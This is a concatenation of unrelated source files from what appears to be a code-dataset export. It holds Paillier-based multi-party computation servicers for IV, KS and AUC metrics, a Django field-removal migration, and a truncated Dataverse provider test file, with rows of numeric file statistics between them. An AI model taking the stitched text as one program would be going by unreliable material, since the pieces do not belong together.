self._sample_size: return metrics_pb2.Sample(sample_size = self._sample_size, feature_size = self._feature_size) else: return metrics_pb2.Sample(sample_size = -1, feature_size = 0) def SendPubkey(self, request, context): """ client send pubkey to server """ paillier = hu.Paillier() paillier.import_pk(request.pk) self._paillier = paillier logger.info('received pub key') return metrics_pb2.Status(code = 1) def GetLabelsSum(self, request, context): """ client get labels sum from server """ batch_size = request.sample_size if (self._sample_size != batch_size): raise ValueError("sample size not equal") logger.info('decoding labels') self._enc_labels = self._paillier.batch_decode(request.labels) all_pos_sum = [] all_neg_sum = [] self._all_bind_r_inv = [] logger.info('calculating labels sum:') for feature_idx in range(self._feature_size): logger.info('processing feature idx {}'.format(feature_idx)) pos_sum = {} neg_sum = {} blind_r_inv_dict = {} feature_bin = {} for sample_index in range(self._sample_size): feature_value = self._features[sample_index][feature_idx] if(feature_value in feature_bin): pos_sum[feature_value] = self._paillier.homm_add(pos_sum[feature_value], self._enc_labels[sample_index]) feature_bin[feature_value] += 1 else: pos_sum[feature_value] = self._enc_labels[sample_index] feature_bin[feature_value] = 1 # cal neg sum for key, value in pos_sum.items(): bin_size_cipher = self._paillier.encrypt_int64_t(feature_bin[key]) neg_sum[key] = self._paillier.homm_minus(bin_size_cipher, value) #Blind using random numbers N/8 bits for key in pos_sum.keys(): blind_r = self._paillier.get_random_bits(self._paillier.byte_len(0)) blind_r_inv_dict[key] = hu.mod_inv(blind_r, self._paillier.n()) pos_sum[key] = self._paillier.homm_mult(pos_sum[key], blind_r) pos_sum[key] = self._paillier.encode_cipher_bytes(pos_sum[key]) neg_sum[key] = self._paillier.homm_mult(neg_sum[key], blind_r) neg_sum[key] = self._paillier.encode_cipher_bytes(neg_sum[key]) all_pos_sum.append(pos_sum) all_neg_sum.append(neg_sum) self._all_bind_r_inv.append(blind_r_inv_dict) feature_labels_sum = metrics_pb2.FeatureLabelsSum(feature_size = self._feature_size, labels = []) for feature_idx in range(self._feature_size): bin_labels_sum = metrics_pb2.BinLabelsSum(bins_size = len(all_pos_sum[feature_idx]), positive_sum = all_pos_sum[feature_idx], negative_sum = all_neg_sum[feature_idx]) feature_labels_sum.labels.append(bin_labels_sum) logger.info('sending labels sum') return feature_labels_sum def GetEncIV(self, request, context): """ client get enc iv """ all_iv = [] logger.info('received blind encryptd iv') logger.info('calculating unblind iv') for feature_idx in range(request.feature_size): logger.info('processing feature idx {}'.format(feature_idx)) blind_iv_dict = {} recved_dict = request.values[feature_idx].value_dict iv = self._paillier.encrypt_int64_t(0) for key in recved_dict: blind_iv_dict[key] = self._paillier.decode(recved_dict[key]) blind_iv_dict[key] = self._paillier.homm_mult(blind_iv_dict[key], self._all_bind_r_inv[feature_idx][key]) iv = self._paillier.homm_add(iv, blind_iv_dict[key]) all_iv.append(self._paillier.encode_cipher_bytes(iv)) logger.info('sending unblind encryptd iv') return metrics_pb2.EncFeatureMetric(feature_size = len(all_iv), values = all_iv) def SendIV(self, request, context): """ client send iv to server """ iv_list = request.values for feature_idx in range(len(iv_list)): self._iv_list.append(round(iv_list[feature_idx], 6)) logger.info('received iv') self._stop_event.set() return metrics_pb2.Status(code = 1) def SendWOE(self, request, context): """ client send woe to server """ for feature_idx in range(request.feature_size): woe_dict = request.values[feature_idx].value_dict woe_dict_ = {} for key in woe_dict.keys(): woe_dict_[key] = round(woe_dict[key], 6) self._woe_list.append(woe_dict_) logger.info('received woe') return metrics_pb2.Status(code = 1) class MpcKSServicer(metrics_pb2_grpc.MpcKSServicer): """ ks servicer implementation """ def __init__(self, features, stop_event, ks_list, num_thresholds=2047): """ load feature to server prams: features: a feature list in the shape of (sample_size, features_size) e.g. [[4, 3, 1], [1, 2, 5],...,[2, 3 ,2]] (feature_size = 3) stop_event: control the server shutdown when the server does not participate in the protocol ks_list: server store the result in ks_list num_thresholds: num of bins """ self._sample_size = len(features) self._features = features self._feature_size = len(features[0]) self._stop_event = stop_event self._ks_list = ks_list self._num_thresholds = num_thresholds logger.info('feature size: {0}, sample size: {1}'.format( self._feature_size, self._sample_size)) def SyncSampleSize(self, request, context): """ client sync sample size and feature size with server """ logger.info('received client\'s sample size: {}'.format(request.sample_size)) if request.sample_size == self._sample_size: return metrics_pb2.Sample(sample_size = self._sample_size, feature_size = self._feature_size) else: return metrics_pb2.Sample(sample_size = -1, feature_size = 0) def SendPubkey(self, request, context): """ client send pubkey to server """ paillier = hu.Paillier() paillier.import_pk(request.pk) self._paillier = paillier logger.info('received pub key') return metrics_pb2.Status(code = 1) def GetCumLabelsSum(self, request, context): """ client get cum labels sum from server """ batch_size = request.sample_size if (self._sample_size != batch_size): raise ValueError("sample size not equal") logger.info('decoding labels') self._enc_labels = self._paillier.batch_decode(request.labels) all_pos_cum_sum = [] all_neg_cum_sum = [] self._all_bind_r_inv = [] logger.info('calculating cum labels sum:') for feature_idx in range(self._feature_size): logger.info('processing feature idx {}'.format(feature_idx)) pos_sum = {} neg_sum = {} blind_r_inv_dict = {} feature_bin = {} feature_values = [val[feature_idx] for val in self._features] # quantile-based discretization,cut feature into equal-sized buckets,return integer indicators of the bins feature_values = pd.qcut(feature_values, q=self._num_thresholds,labels=False, retbins=False, duplicates="drop") # get max bin index, fill nan with this value max_bin_idx = int(max(feature_values) + 1) for sample_index in range(self._sample_size): feature_value = feature_values[sample_index] if np.isnan(feature_value): feature_value = max_bin_idx else: feature_value = int(feature_value) if(feature_value in feature_bin): pos_sum[feature_value] = self._paillier.homm_add(pos_sum[feature_value], self._enc_labels[sample_index]) feature_bin[feature_value] += 1 else: pos_sum[feature_value] = self._enc_labels[sample_index] feature_bin[feature_value] = 1 # sort pos sum pos_sum = dict(sorted(pos_sum.items(), key = lambda item:item[0])) # cal neg sum for key, value in pos_sum.items(): bin_size_cipher = self._paillier.encrypt_int64_t(feature_bin[key]) neg_sum[key] = self._paillier.homm_minus(bin_size_cipher, value) # cum pos and neg pos_temp = self._paillier.encrypt_int64_t(0) neg_temp = self._paillier.encrypt_int64_t(0) for key in pos_sum.keys(): pos_sum[key] = self._paillier.homm_add(pos_sum[key], pos_temp) pos_temp = pos_sum[key] neg_sum[key] = self._paillier.homm_add(neg_sum[key], neg_temp) neg_temp = neg_sum[key] #Blind using random numbers N/8 bits for key in pos_sum.keys(): blind_r = self._paillier.get_random_bits(self._paillier.byte_len(0)) blind_r_inv_dict[key] = hu.mod_inv(blind_r, self._paillier.n()) pos_sum[key] = self._paillier.homm_mult(pos_sum[key], blind_r) pos_sum[key] = self._paillier.encode_cipher_bytes(pos_sum[key]) neg_sum[key] = self._paillier.homm_mult(neg_sum[key], blind_r) neg_sum[key] = self._paillier.encode_cipher_bytes(neg_sum[key]) all_pos_cum_sum.append(pos_sum) all_neg_cum_sum.append(neg_sum) self._all_bind_r_inv.append(blind_r_inv_dict) feature_labels_sum = metrics_pb2.FeatureLabelsSum(feature_size = self._feature_size, labels = []) for feature_idx in range(self._feature_size): bin_labels_sum = metrics_pb2.BinLabelsSum(bins_size = len(all_pos_cum_sum[feature_idx]), positive_sum = all_pos_cum_sum[feature_idx], negative_sum = all_neg_cum_sum[feature_idx]) feature_labels_sum.labels.append(bin_labels_sum) logger.info('sending cum labels sum') return feature_labels_sum def GetEncKS(self, request, context): """ client get enc ks """ logger.info('received blind encryptd ks') logger.info('calculating unblind ks') all_ks = metrics_pb2.EncFeatureMetricList(feature_size = request.feature_size, values = []) for feature_idx in range(request.feature_size): logger.info('processing feature idx {}'.format(feature_idx)) blind_ks_list = [] recved_dict = request.values[feature_idx].value_dict for key in recved_dict.keys(): blind_ks = self._paillier.decode(recved_dict[key]) blind_ks = self._paillier.homm_mult(blind_ks, self._all_bind_r_inv[feature_idx][key]) blind_ks = self._paillier.encode_cipher_bytes(blind_ks) blind_ks_list.append(blind_ks) random.shuffle(blind_ks_list) enc_bin_metric_list = metrics_pb2.EncBinMetricList(bins_size = len(blind_ks_list), value = blind_ks_list) all_ks.values.append(enc_bin_metric_list) logger.info('sending unblind encryptd ks') return all_ks def SendKS(self, request, context): """ client send ks to server """ ks_list = request.values for feature_idx in range(len(ks_list)): self._ks_list.append(round(ks_list[feature_idx], 6)) logger.info('received ks') self._stop_event.set() return metrics_pb2.Status(code = 1) class MpcAUCServicer(metrics_pb2_grpc.MpcAUCServicer): """ auc servicer implementation """ def __init__(self, features, stop_event, auc_list, num_thresholds=2047): """ load feature to server prams: features: a feature list in the shape of (sample_size, features_size) e.g. [[4, 3, 1], [1, 2, 5],...,[2, 3 ,2]] (feature_size = 3) stop_event: control the server shutdown when the server does not participate in the protocol auc_list: server store the result in auc_list """ self._sample_size = len(features) self._features = features self._feature_size = len(features[0]) self._stop_event = stop_event self._auc_list = auc_list self._num_thresholds = num_thresholds logger.info('feature size: {0}, sample size: {1}'.format( self._feature_size, self._sample_size)) def SyncSampleSize(self, request, context): """ client sync sample size and feature size with server """ logger.info('received client\'s sample size: {}'.format(request.sample_size)) if request.sample_size == self._sample_size: return metrics_pb2.Sample(sample_size = self._sample_size, feature_size = self._feature_size) else: return metrics_pb2.Sample(sample_size = -1, feature_size = 0) def SendPubkey(self, request, context): """ client send pubkey to server """ paillier = hu.Paillier() paillier.import_pk(request.pk) self._paillier = paillier logger.info('received pub key') return metrics_pb2.Status(code = 1) def GetLabelsSum(self, request, context): """ client get blind auc from server """ batch_size = request.sample_size if (self._sample_size != batch_size): raise ValueError("sample size not equal") logger.info('decoding labels') self._enc_labels = self._paillier.batch_decode(request.labels) all_pos_sum = [] all_neg_sum = [] self._all_auc_blind = [] logger.info('calculating labels sum:') for feature_idx in range(self._feature_size): logger.info('processing feature idx {}'.format(feature_idx)) stat_pos_sum = {} stat_neg_sum = {} feature_bin = {} feature_values = [val[feature_idx] for val in self._features] # quantile-based discretization,cut feature into equal-sized buckets,return integer indicators of the bins feature_values = pd.qcut(feature_values, q=self._num_thresholds,labels=False, retbins=False, duplicates="drop") # get max bin index, fill nan with this value max_bin_idx = int(max(feature_values) + 1) for sample_index in range(self._sample_size): if np.isnan(feature_values[sample_index]): bin_idx = max_bin_idx else: bin_idx = int(feature_values[sample_index]) if(bin_idx in feature_bin): stat_pos_sum[bin_idx] = self._paillier.homm_add(stat_pos_sum[bin_idx], self._enc_labels[sample_index]) feature_bin[bin_idx] += 1 else: stat_pos_sum[bin_idx] = self._enc_labels[sample_index] feature_bin[bin_idx] = 1 # sort pos sum stat_pos_sum = dict(sorted(stat_pos_sum.items(), key = lambda item:item[0], reverse=True)) # cal neg sum for key, value in stat_pos_sum.items(): bin_size_cipher = self._paillier.encrypt_int64_t(feature_bin[key]) stat_neg_sum[key] = self._paillier.homm_minus(bin_size_cipher, value) # cal blind_auc and blind res tot_pos = self._paillier.encrypt_int64_t(0) tot_neg = self._paillier.encrypt_int64_t(0) tot_blind = self._paillier.encrypt_int64_t(0) for key in stat_pos_sum.keys(): tot_pos_prev = tot_pos tot_neg_prev = tot_neg tot_pos = self._paillier.homm_add(stat_pos_sum[key], tot_pos) tot_neg = self._paillier.homm_add(stat_neg_sum[key], tot_neg) neg_temp = self._paillier.homm_minus(tot_neg, tot_neg_prev) pos_temp = self._paillier.homm_add(tot_pos, tot_pos_prev) neg_blind_r = self._paillier.get_random_bits(self._paillier.byte_len(0)) pos_blind_r = self._paillier.get_random_bits(self._paillier.byte_len(0)) cipher_temp = self._paillier.homm_mult(neg_temp, pos_blind_r) tot_blind = self._paillier.homm_add(tot_blind, cipher_temp) cipher_temp = self._paillier.homm_mult(pos_temp, neg_blind_r) tot_blind = self._paillier.homm_add(tot_blind, cipher_temp) cipher_temp = self._paillier.homm_mult(self._paillier.encrypt(neg_blind_r), pos_blind_r) tot_blind = self._paillier.homm_add(tot_blind, cipher_temp) neg_temp = self._paillier.homm_add(neg_temp, self._paillier.encrypt(neg_blind_r)) pos_temp = self._paillier.homm_add(pos_temp, self._paillier.encrypt(pos_blind_r)) stat_pos_sum[key] = self._paillier.encode_cipher_bytes(pos_temp) stat_neg_sum[key] = self._paillier.encode_cipher_bytes(neg_temp) all_pos_sum.append(stat_pos_sum) all_neg_sum.append(stat_neg_sum) self._all_auc_blind.append(tot_blind) feature_labels_sum = metrics_pb2.FeatureLabelsSum(feature_size = self._feature_size, labels = []) for feature_idx in range(self._feature_size): bin_labels_sum = metrics_pb2.BinLabelsSum(bins_size = len(all_pos_sum[feature_idx]), positive_sum = all_pos_sum[feature_idx], negative_sum = all_neg_sum[feature_idx]) feature_labels_sum.labels.append(bin_labels_sum) logger.info('sending labels sum') return feature_labels_sum def GetEncAUC(self, request, context): """ client get enc auc """ all_auc_ = [] logger.info('received blind encryptd auc') logger.info('calculating unblind auc') for feature_idx in range(request.feature_size): enc_auc = self._paillier.decode(request.values[feature_idx]) enc_auc = self._paillier.homm_minus(enc_auc, self._all_auc_blind[feature_idx]) all_auc_.append(self._paillier.encode_cipher_bytes(enc_auc)) all_auc = metrics_pb2.EncFeatureMetric(feature_size = request.feature_size, values = all_auc_) logger.info('sending unblind encryptd auc') return all_auc def SendAUC(self, request, context): """ client send auc to server """ auc_list = request.values for feature_idx in range(len(auc_list)): self._auc_list.append(round(auc_list[feature_idx], 6)) logger.info('received auc') self._stop_event.set() return metrics_pb2.Status(code = 1)
45.339411
123
0.584279
3,850
32,327
4.58026
0.068831
0.061245
0.032664
0.025519
0.862935
0.820801
0.787116
0.757741
0.73018
0.705626
0
0.009154
0.327559
32,327
712
124
45.40309
0.802052
0.119529
0
0.709812
0
0.004175
0.045085
0
0
0
0
0
0
1
0.058455
false
0
0.029228
0
0.156576
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
7da4146c4da0d8daf5d6211420dc37df80939b31
8,407
py
Python
site_settings/migrations/0026_auto_20210531_0653.py
diffractive/newstream
cf1a1f230e18d01c63b50ab9d360aa44ac5a486f
[ "MIT" ]
1
2020-05-03T12:33:42.000Z
2020-05-03T12:33:42.000Z
site_settings/migrations/0026_auto_20210531_0653.py
diffractive/newstream
cf1a1f230e18d01c63b50ab9d360aa44ac5a486f
[ "MIT" ]
14
2020-07-06T20:05:57.000Z
2022-03-12T00:39:11.000Z
site_settings/migrations/0026_auto_20210531_0653.py
diffractive/newstream
cf1a1f230e18d01c63b50ab9d360aa44ac5a486f
[ "MIT" ]
null
null
null
# Generated by Django 3.1.11 on 2021-05-31 06:53 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('site_settings', '0025_usermetafield_clean_name'), ] operations = [ migrations.RemoveField( model_name='sitesettings', name='_2c2p_frontend_label_en', ), migrations.RemoveField( model_name='sitesettings', name='_2c2p_frontend_label_id_id', ), migrations.RemoveField( model_name='sitesettings', name='_2c2p_frontend_label_ms', ), migrations.RemoveField( model_name='sitesettings', name='_2c2p_frontend_label_tl', ), migrations.RemoveField( model_name='sitesettings', name='_2c2p_frontend_label_zh_hant', ), migrations.RemoveField( model_name='sitesettings', name='manual_frontend_label_en', ), migrations.RemoveField( model_name='sitesettings', name='manual_frontend_label_id_id', ), migrations.RemoveField( model_name='sitesettings', name='manual_frontend_label_ms', ), migrations.RemoveField( model_name='sitesettings', name='manual_frontend_label_tl', ), migrations.RemoveField( model_name='sitesettings', name='manual_frontend_label_zh_hant', ), migrations.RemoveField( model_name='sitesettings', name='offline_frontend_label_en', ), migrations.RemoveField( model_name='sitesettings', name='offline_frontend_label_id_id', ), migrations.RemoveField( model_name='sitesettings', name='offline_frontend_label_ms', ), migrations.RemoveField( model_name='sitesettings', name='offline_frontend_label_tl', ), migrations.RemoveField( model_name='sitesettings', name='offline_frontend_label_zh_hant', ), migrations.RemoveField( model_name='sitesettings', name='offline_instructions_text_en', ), migrations.RemoveField( model_name='sitesettings', name='offline_instructions_text_id_id', ), migrations.RemoveField( model_name='sitesettings', name='offline_instructions_text_ms', ), migrations.RemoveField( model_name='sitesettings', name='offline_instructions_text_tl', ), migrations.RemoveField( model_name='sitesettings', name='offline_instructions_text_zh_hant', ), migrations.RemoveField( model_name='sitesettings', name='offline_thankyou_text_en', ), migrations.RemoveField( model_name='sitesettings', name='offline_thankyou_text_id_id', ), migrations.RemoveField( model_name='sitesettings', name='offline_thankyou_text_ms', ), migrations.RemoveField( model_name='sitesettings', name='offline_thankyou_text_tl', ), migrations.RemoveField( model_name='sitesettings', name='offline_thankyou_text_zh_hant', ), migrations.RemoveField( model_name='sitesettings', name='paypal_frontend_label_en', ), migrations.RemoveField( model_name='sitesettings', name='paypal_frontend_label_id_id', ), migrations.RemoveField( model_name='sitesettings', name='paypal_frontend_label_ms', ), migrations.RemoveField( model_name='sitesettings', name='paypal_frontend_label_tl', ), migrations.RemoveField( model_name='sitesettings', name='paypal_frontend_label_zh_hant', ), migrations.RemoveField( model_name='sitesettings', name='paypal_legacy_frontend_label_en', ), migrations.RemoveField( model_name='sitesettings', name='paypal_legacy_frontend_label_id_id', ), migrations.RemoveField( model_name='sitesettings', name='paypal_legacy_frontend_label_ms', ), migrations.RemoveField( model_name='sitesettings', name='paypal_legacy_frontend_label_tl', ), migrations.RemoveField( model_name='sitesettings', name='paypal_legacy_frontend_label_zh_hant', ), migrations.RemoveField( model_name='sitesettings', name='signup_footer_text_en', ), migrations.RemoveField( model_name='sitesettings', name='signup_footer_text_id_id', ), migrations.RemoveField( model_name='sitesettings', name='signup_footer_text_ms', ), migrations.RemoveField( model_name='sitesettings', name='signup_footer_text_tl', ), migrations.RemoveField( model_name='sitesettings', name='signup_footer_text_zh_hant', ), migrations.RemoveField( model_name='sitesettings', name='stripe_frontend_label_en', ), migrations.RemoveField( model_name='sitesettings', name='stripe_frontend_label_id_id', ), migrations.RemoveField( model_name='sitesettings', name='stripe_frontend_label_ms', ), migrations.RemoveField( model_name='sitesettings', name='stripe_frontend_label_tl', ), migrations.RemoveField( model_name='sitesettings', name='stripe_frontend_label_zh_hant', ), migrations.RemoveField( model_name='usermetafield', name='choices_en', ), migrations.RemoveField( model_name='usermetafield', name='choices_id_id', ), migrations.RemoveField( model_name='usermetafield', name='choices_ms', ), migrations.RemoveField( model_name='usermetafield', name='choices_tl', ), migrations.RemoveField( model_name='usermetafield', name='choices_zh_hant', ), migrations.RemoveField( model_name='usermetafield', name='default_value_en', ), migrations.RemoveField( model_name='usermetafield', name='default_value_id_id', ), migrations.RemoveField( model_name='usermetafield', name='default_value_ms', ), migrations.RemoveField( model_name='usermetafield', name='default_value_tl', ), migrations.RemoveField( model_name='usermetafield', name='default_value_zh_hant', ), migrations.RemoveField( model_name='usermetafield', name='help_text_en', ), migrations.RemoveField( model_name='usermetafield', name='help_text_id_id', ), migrations.RemoveField( model_name='usermetafield', name='help_text_ms', ), migrations.RemoveField( model_name='usermetafield', name='help_text_tl', ), migrations.RemoveField( model_name='usermetafield', name='help_text_zh_hant', ), migrations.RemoveField( model_name='usermetafield', name='label_en', ), migrations.RemoveField( model_name='usermetafield', name='label_id_id', ), migrations.RemoveField( model_name='usermetafield', name='label_ms', ), migrations.RemoveField( model_name='usermetafield', name='label_tl', ), migrations.RemoveField( model_name='usermetafield', name='label_zh_hant', ), ]
30.682482
59
0.557749
680
8,407
6.498529
0.076471
0.308893
0.382439
0.441276
0.96334
0.96334
0.96334
0.880516
0.698574
0.291695
0
0.005461
0.346497
8,407
273
60
30.794872
0.798872
0.005472
0
0.730337
1
0
0.274674
0.148582
0
0
0
0
0
1
0
false
0
0.003745
0
0.014981
0
0
0
0
null
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
9
818b8178cee287565d6faee7b38b70b412d968e1
18,607
py
Python
tests/providers/dataverse/test_provider.py
laurenrevere/waterbutler
4f358d94376997cd9592b18b67d13a7482c7aa2a
[ "Apache-2.0" ]
null
null
null
tests/providers/dataverse/test_provider.py
laurenrevere/waterbutler
4f358d94376997cd9592b18b67d13a7482c7aa2a
[ "Apache-2.0" ]
null
null
null
tests/providers/dataverse/test_provider.py
laurenrevere/waterbutler
4f358d94376997cd9592b18b67d13a7482c7aa2a
[ "Apache-2.0" ]
null
null
null
import pytest from tests.utils import async import io import json import aiohttpretty from waterbutler.core import streams from waterbutler.core import exceptions from waterbutler.providers.dataverse import settings as dvs from waterbutler.providers.dataverse import DataverseProvider from waterbutler.providers.dataverse.metadata import DataverseFileMetadata @pytest.fixture def auth(): return { 'name': 'cat', 'email': 'cat@cat.com', } @pytest.fixture def credentials(): return {'token': 'wrote harry potter'} @pytest.fixture def settings(): return { 'host': 'myfakehost.dataverse.org', 'doi': 'doi:10.5072/FK2/ABCDEF', 'id': '18', 'name': 'A look at wizards', } @pytest.fixture def provider(auth, credentials, settings): return DataverseProvider(auth, credentials, settings) @pytest.fixture def file_content(): return b'SLEEP IS FOR THE WEAK GO SERVE STREAMS' @pytest.fixture def file_like(file_content): return io.BytesIO(file_content) @pytest.fixture def file_stream(file_like): return streams.FileStreamReader(file_like) @pytest.fixture def native_file_metadata(): return {'datafile': {'contentType': 'text/plain; charset=US-ASCII', 'description': '', 'filename': '%2Fusr%2Flocal%2Fglassfish4%2Fglassfish%2Fdomains%2Fdomain1%2Ffiles%2F10.5072%2FFK2%2F232XYH%2F14c7a73d734-8383551cc713', 'id': 20, 'md5': 'acbd18db4cc2f85cedef654fccc4a4d8', 'name': 'thefile.txt', 'originalFormatLabel': 'UNKNOWN'}, 'datasetVersionId': 5, 'description': '', 'label': 'thefile.txt', 'version': 1} @pytest.fixture def native_dataset_metadata(): return {'data': {'createTime': '2015-04-02T13:21:59Z', 'distributionDate': 'Distribution Date', 'files': [{'datafile': {'contentType': 'text/plain; charset=US-ASCII', 'description': '', 'filename': '%2Fusr%2Flocal%2Fglassfish4%2Fglassfish%2Fdomains%2Fdomain1%2Ffiles%2F10.5072%2FFK2%2F232XYH%2F14c7a73c684-4b22a1757aed', 'id': 19, 'md5': '2243b9249ca96f7cca9f58f7584b5ddb', 'name': 'UnZip.java', 'originalFormatLabel': 'UNKNOWN'}, 'datasetVersionId': 5, 'description': '', 'label': 'UnZip.java', 'version': 1}, {'datafile': {'contentType': 'text/plain; charset=US-ASCII', 'description': '', 'filename': '%2Fusr%2Flocal%2Fglassfish4%2Fglassfish%2Fdomains%2Fdomain1%2Ffiles%2F10.5072%2FFK2%2F232XYH%2F14c7a73d734-8383551cc713', 'id': 20, 'md5': 'acbd18db4cc2f85cedef654fccc4a4d8', 'name': 'thefile.txt', 'originalFormatLabel': 'UNKNOWN'}, 'datasetVersionId': 5, 'description': '', 'label': 'thefile.txt', 'version': 1}, {'datafile': {'contentType': 'application/octet-stream', 'description': '', 'filename': '%2Fusr%2Flocal%2Fglassfish4%2Fglassfish%2Fdomains%2Fdomain1%2Ffiles%2F10.5072%2FFK2%2F232XYH%2F14c7a73e419-b578b719b05c', 'id': 21, 'md5': 'ee5a34fe861617916acde862d4206280', 'name': 'UnZip.class', 'originalFormatLabel': 'UNKNOWN'}, 'datasetVersionId': 5, 'description': '', 'label': 'UnZip.class', 'version': 1}], 'id': 5, 'lastUpdateTime': '2015-04-02T15:26:21Z', 'metadataBlocks': {'citation': {'displayName': 'Citation Metadata', 'fields': [{'multiple': False, 'typeClass': 'primitive', 'typeName': 'title', 'value': 'A look at wizards'}, {'multiple': True, 'typeClass': 'compound', 'typeName': 'author', 'value': [{'authorName': {'multiple': False, 'typeClass': 'primitive', 'typeName': 'authorName', 'value': 'Baggins, Bilbo'}}]}, {'multiple': True, 'typeClass': 'compound', 'typeName': 'datasetContact', 'value': [{'datasetContactEmail': {'multiple': False, 'typeClass': 'primitive', 'typeName': 'datasetContactEmail', 'value': 'email@email.com'}, 'datasetContactName': {'multiple': False, 'typeClass': 'primitive', 'typeName': 'datasetContactName', 'value': 'Baggins, Bilbo'}}]}, {'multiple': True, 'typeClass': 'compound', 'typeName': 'dsDescription', 'value': [{'dsDescriptionValue': {'multiple': False, 'typeClass': 'primitive', 'typeName': 'dsDescriptionValue', 'value': 'desc'}}]}, {'multiple': True, 'typeClass': 'controlledVocabulary', 'typeName': 'subject', 'value': ['Other']}, {'multiple': False, 'typeClass': 'primitive', 'typeName': 'depositor', 'value': 'Baggins, Bilbo'}, {'multiple': False, 'typeClass': 'primitive', 'typeName': 'dateOfDeposit', 'value': '2015-04-02'}]}}, 'productionDate': 'Production Date', 'releaseTime': '2015-04-02T15:26:21Z', 'versionMinorNumber': 0, 'versionNumber': 1, 'versionState': 'RELEASED'}} @pytest.fixture def empty_native_dataset_metadata(): return {'data': {'createTime': '2015-04-02T13:21:59Z', 'distributionDate': 'Distribution Date', 'files': [], 'id': 5, 'lastUpdateTime': '2015-04-02T15:26:21Z', 'metadataBlocks': {'citation': {'displayName': 'Citation Metadata', 'fields': [{'multiple': False, 'typeClass': 'primitive', 'typeName': 'title', 'value': 'A look at wizards'}, {'multiple': True, 'typeClass': 'compound', 'typeName': 'author', 'value': [{'authorName': {'multiple': False, 'typeClass': 'primitive', 'typeName': 'authorName', 'value': 'Baggins, Bilbo'}}]}, {'multiple': True, 'typeClass': 'compound', 'typeName': 'datasetContact', 'value': [{'datasetContactEmail': {'multiple': False, 'typeClass': 'primitive', 'typeName': 'datasetContactEmail', 'value': 'email@email.com'}, 'datasetContactName': {'multiple': False, 'typeClass': 'primitive', 'typeName': 'datasetContactName', 'value': 'Baggins, Bilbo'}}]}, {'multiple': True, 'typeClass': 'compound', 'typeName': 'dsDescription', 'value': [{'dsDescriptionValue': {'multiple': False, 'typeClass': 'primitive', 'typeName': 'dsDescriptionValue', 'value': 'desc'}}]}, {'multiple': True, 'typeClass': 'controlledVocabulary', 'typeName': 'subject', 'value': ['Other']}, {'multiple': False, 'typeClass': 'primitive', 'typeName': 'depositor', 'value': 'Baggins, Bilbo'}, {'multiple': False, 'typeClass': 'primitive', 'typeName': 'dateOfDeposit', 'value': '2015-04-02'}]}}, 'productionDate': 'Production Date', 'releaseTime': '2015-04-02T15:26:21Z', 'versionMinorNumber': 0, 'versionNumber': 1, 'versionState': 'RELEASED'}} class TestCRUD: @async @pytest.mark.aiohttpretty def test_download(self, provider, native_dataset_metadata): path = '/21' url = provider.build_url(dvs.DOWN_BASE_URL, path, key=provider.token) draft_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) published_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest-published'), key=provider.token) aiohttpretty.register_uri('GET', url, body=b'better', auto_length=True) aiohttpretty.register_json_uri('GET', draft_url, status=200, body=native_dataset_metadata) aiohttpretty.register_json_uri('GET', published_url, status=200, body=native_dataset_metadata) path = yield from provider.validate_path(path) result = yield from provider.download(path) content = yield from result.read() assert content == b'better' @async @pytest.mark.aiohttpretty def test_download_not_found(self, provider, native_dataset_metadata): path = '/21' url = provider.build_url(dvs.DOWN_BASE_URL, path, key=provider.token) aiohttpretty.register_uri('GET', url, status=404) draft_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) aiohttpretty.register_json_uri('GET', draft_url, status=200, body=native_dataset_metadata) published_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest-published'), key=provider.token) aiohttpretty.register_json_uri('GET', published_url, status=200, body=native_dataset_metadata) path = yield from provider.validate_path(path) with pytest.raises(exceptions.DownloadError): yield from provider.download(path) @async @pytest.mark.aiohttpretty def test_download_invalid_path(self, provider, native_dataset_metadata): path = '/50' draft_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) aiohttpretty.register_json_uri('GET', draft_url, status=200, body=native_dataset_metadata) published_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest-published'), key=provider.token) aiohttpretty.register_json_uri('GET', published_url, status=200, body=native_dataset_metadata) path = yield from provider.validate_path(path) with pytest.raises(exceptions.NotFoundError): yield from provider.download(path) @async @pytest.mark.aiohttpretty def test_upload_create(self, provider, file_stream, native_file_metadata, empty_native_dataset_metadata, native_dataset_metadata): path = '/thefile.txt' url = provider.build_url(dvs.EDIT_MEDIA_BASE_URL, 'study', provider.doi) aiohttpretty.register_uri('POST', url, status=201) latest_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) latest_published_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest-published'), key=provider.token) aiohttpretty.register_json_uri('GET', latest_published_url, body={'data': {'files': []}}) aiohttpretty.register_uri('GET', latest_url, responses=[ { 'status': 200, 'body': json.dumps(empty_native_dataset_metadata).encode('utf-8'), 'headers': {'Content-Type': 'application/json'}, }, { 'status': 200, 'body': json.dumps(native_dataset_metadata).encode('utf-8'), 'headers': {'Content-Type': 'application/json'}, }, ]) path = yield from provider.validate_path(path) metadata, created = yield from provider.upload(file_stream, path) entry = native_file_metadata['datafile'] expected = DataverseFileMetadata(entry, 'latest').serialized() assert created is True assert metadata == expected assert aiohttpretty.has_call(method='POST', uri=url) assert aiohttpretty.has_call(method='GET', uri=latest_url) assert aiohttpretty.has_call(method='GET', uri=latest_published_url) @async @pytest.mark.aiohttpretty def test_upload_updates(self, provider, file_stream, native_file_metadata, native_dataset_metadata): path = '/20' url = provider.build_url(dvs.EDIT_MEDIA_BASE_URL, 'study', provider.doi) aiohttpretty.register_uri('POST', url, status=201) published_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) aiohttpretty.register_json_uri('GET', published_url, status=200, body=native_dataset_metadata) delete_url = provider.build_url(dvs.EDIT_MEDIA_BASE_URL, 'file', '/20') # Old file id aiohttpretty.register_json_uri('DELETE', delete_url, status=204) latest_published_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest-published'), key=provider.token) 